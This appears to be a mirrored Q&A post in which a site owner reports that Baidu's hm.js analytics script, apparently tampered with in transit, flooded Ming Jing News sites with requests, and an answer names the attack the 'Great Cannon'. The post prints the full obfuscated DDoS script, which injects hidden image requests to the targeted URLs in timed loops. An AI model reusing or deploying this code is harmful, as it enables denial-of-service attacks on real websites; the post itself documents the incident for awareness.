Update:
It seems that different hm.js (Baidu TongJi JS library) are loaded. When no DDOS attack is observed, a standard hm.js is loaded; when there is a DDOS, a totally different hm.js is loaded. I am suspecting the Great Firewall of China is altering the code.
This is the hm.js that has been modified to launch DDOS:
// the following code launches DDOS against sites like mingjingnews.com eval(function(p, a, c, k, e, d) { e = function(c) { return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) } ; if (!''.replace(/^/, String)) { while (c--) d[e(c)] = k[c] || e(c); k = [function(e) { return d[e] } ]; e = function() { return '\\w+' } ; c = 1; } ;while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b','g'), k[c]); return p; }('c((/15\\/([\\d]+)/16.17(l.A.D.E())[1]>=12)&&(l.A.D.E().14("18")<0)){3 G=1c;3 p=[\'i://1d.o.j/\',\'i://1e.o.j/\',\'i://19.o.j/\',\'i://1a.1b.j/\',\'i://S.o.j/U/Y/Z.11\'];3 J=V;3 n=W;3 N=10;3 v=1;g u(){3 a=e 7();H 7.X(a.T(),a.1w(),a.1x(),a.1v(),a.P(),a.L())/R}h.C("F")[0].I="<1t 1u=\\"B\\" 1y=\\"1C-B\\">"+h.C("F")[0].I;3 6=[];3 f=[];3 x=5;3 b=[];3 9=[];3 w=\'\';3 m=0;g q(2){3 8=6[2];c(8!=5){h.z.1B(8)}6[2]=5;c(m<J&&9[2]-x<G){O(\'s(\'+2+\')\',(9[2]-b[2])>n?n:(9[2]-b[2]))}}g Q(2){c(6[2]==5){H}c(6[2].1j){l.y(f[2]);9[2]=e 7().k();q(2)}1k{c(e 7().k()-b[2]>n){l.y(f[2]);q(2)}}}g s(2){8=h.z.1q(h.1r(\'1m\'));w=p[u()%p.1o];8.1n=w+\'?t=\'+u()+M.1p(M.1l()*1h);8.1g.1f=\'1i\';6[2]=8;b[2]=9[2]=e 7().k();f[2]=1s("Q("+2+")",1A);m=m+1}g K(){x=e 7().k();1z(3 4=0;4<N;4+=1){6[4]=5;f[4]=5;b[4]=5;9[4]=5;s(4)}}3 r=e 7();O(\'K()\',((v-r.P()%v)*13-r.L())*R)}', 62, 101, '||index|var|ti|null|p_img_list|Date|p_img_tmp|responsetime_list|dt|requesttime_list|if||new|timer_list|function|document|http|com|getTime|window|count|TIMEGAP|mingjingnews|url_list|imgdel|now|imgadd||unixtime|START_CLOCK|url|starttime|clearInterval|body|navigator|referrer|getElementsByTagName|userAgent|toLowerCase|head|MAX_TIME|return|innerHTML|MAX_COUNT|start|getSeconds|Math|THREAD|setTimeout|getMinutes|isImgComplete|1000|bravo1|getFullYear|2017|100000000|500|UTC|01|bravo||html|34|60|indexOf|chrome|gi|exec|edge|tv2|www|mingjingtimes|300000|news2|s3|display|style|100|none|complete|else|random|img|src|length|ceil|appendChild|createElement|setInterval|meta|name|getHours|getMonth|getDate|content|for|50|removeChild|no'.split('|'), 0, {}))
Compare this to the original hm.js code, where no DDOS is present.
Both of these 2 hm.js libraries are coming from the exact same address.
I have a site that uses Baidu TongJi (Analytics). Like most other javascript libraries, it is done through injecting a line of Javascript to the HTML.
module.exports = function(id) { if (!id) { throw new Error('请填写百度统计id'); } var elm = document.createElement('script'); elm.src = '//hm.baidu.com/hm.js?' + id; var body = document.getElementsByTagName('body')[0]; body.appendChild(elm); }
To my horror, once it has initialised, my browser's console and network screen is flood with around 3000+ network requests to Ming Jing News (fake news according to Chinese's communist government) in just 100 seconds... and it kept going until I stopped it.
I am starting to think this is similar to the last time the great wall of china was used to launch attacks to GitHub using Baidu's CDN.
https://www.google.com.hk/search?client=safari&rls=en&q=hm.baidu.com+DDOS+attack&ie=UTF-8&oe=UTF-8&gfe_rd=cr&ei=g6efWbu5JYzM8gfJ2pqQDg
https://news.ycombinator.com/item?id=9275771
I am currently calling Baidu from outside of the China and I am wondering if this is normal... Will the people inside China be spared from this?
As suggested by a now deleted answer by kos, this is is a (relatively) new form of attack employed by China. It was made famous by an attack on GitHub back in 2015. This form of attack is now known as "Great Cannon".
Details are available on Brian Krebs's security blog.
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With